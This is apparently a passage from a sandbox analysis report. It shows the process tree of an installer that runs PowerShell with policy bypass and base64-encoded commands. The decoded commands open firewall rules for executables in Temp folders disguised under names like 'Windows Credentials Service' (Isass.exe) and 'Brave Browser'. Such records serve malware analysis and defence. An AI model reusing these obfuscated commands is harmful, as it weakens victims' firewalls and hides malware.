ALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUA
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1384
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:752
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssF58C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiF579.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrF57A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrF57B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:2916
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABTAHUAYgBuAGUAdAB3AG8AcgBrACAAQwBvAG4AdAByAG8AbAAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAFMAdQBiAG4AZQB0AHcAbwByAGsAIABDAG8AbgB0AHIAbwBsACAAQwBlAG4AdABlAHIAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAAUwB1AGIAbgBlAHQAdwBvAHIAawAgAEMAbwBuAHQAcgBvAGwAIABDAGUAbgB0AGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABSAHUAbgB0AGkAbQBlAEIAcgBvAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFQAQwBQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVABDAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABUAEMAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:568
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:732
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi19.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:332
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARwByAG8AdQBwACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIATQBlAGQAaQBhACAAQwBlAG4AdABlAHIAIABFAHgAdABlAG4AZABlAHIAIAAtACAASABUAFQAUABTACAAUwB0AHIAZQBhAG0AaQBuAGcAIAAoAFUARABQACkAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBNAGUAZABpAGEAIABDAGUAbgB0AGUAcgAgAEUAeAB0AGUAbgBkAGUAcgAgAC0AIABIAFQAVABQAFMAIABTAHQAcgBlAGEAbQBpAG4AZwAgACgAVQBEAFAAKQAiACAALQBHAHIAbwB1AHAAIAAiAE0AZQBkAGkAYQAgAEMAZQBuAHQAZQByACAARQB4AHQAZQBuAGQAZQByACAALQAgAEgAVABUAFAAUwAgAFMAdAByAGUAYQBtAGkAbgBnACAAKABVAEQAUAApACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABPAHUAdABiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAA==
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2740
    - - C:\Windows\SysWOW64\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2732
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1102.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi10EF.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr10F0.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr10F1.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:948
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABFAFUATABBACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAEUAVQBMAEEAIgAgAC0ARwByAG8AdQBwACAAIgBCAHIAYQB2AGUAIABCAHIAbwB3AHMAZQByACAARQBVAEwAQQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBHAHIAbwB1AHAAIAAiAEIAcgBhAHYAZQAgAEIAcgBvAHcAcwBlAHIAIABNAGEAaQBuAHQAZQBuAGEAbgBjAGUAIABNAG8AZAB1AGwAZQAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAEcAcgBvAHUAcAAgACIAQgByAGEAdgBlACAAQgByAG8AdwBzAGUAcgAgAE0AYQBpAG4AdABlAG4AYQBuAGMAZQAgAEMAZQBuAHQAZQByACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      PID:868
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        Drops file in System32 directory
        Suspicious behavior: EnumeratesProcesses
        
        PID:1480
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss1A5A.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi1A57.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr1A58.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr1A59.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1972
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBXAGkAbgBkAG8AdwBzACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AXABtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAUAB1AGIAbABpAGMAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:1756
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:1984
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss248C.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi2479.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr247A.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr247B.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:1648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
